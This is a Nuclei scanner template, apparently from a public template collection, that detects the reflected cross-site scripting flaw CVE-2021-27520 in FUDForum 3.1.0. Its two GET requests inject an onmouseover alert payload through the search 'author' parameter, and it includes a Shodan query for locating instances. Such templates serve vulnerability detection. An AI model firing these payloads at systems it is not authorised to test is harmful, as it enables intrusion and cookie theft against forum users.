57 lines
2.1 KiB
YAML
57 lines
2.1 KiB
YAML
id: CVE-2021-27520
|
|
|
|
info:
|
|
name: FUDForum 3.1.0 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.
|
|
remediation: |
|
|
Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/49943
|
|
- https://github.com/fudforum/FUDforum/issues/2
|
|
- http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27520
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-27520
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00217
|
|
epss-percentile: 0.5946
|
|
cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: fudforum
|
|
product: fudforum
|
|
shodan-query: html:"FUDforum"
|
|
tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive,fudforum
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D'
|
|
- '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D%22'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- onmouseover=alert(document.domain) x=
|
|
- FUDforum
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e83a062936c4dfcb98734b884c0dbda66d27d238a5d500720bf93e7fa2652d3c0220245e477693cf86aee69200d045ffe2b6c2d877d705e5787853f114cae1cf7b95:922c64590222798bb761d5b6d8e72950 |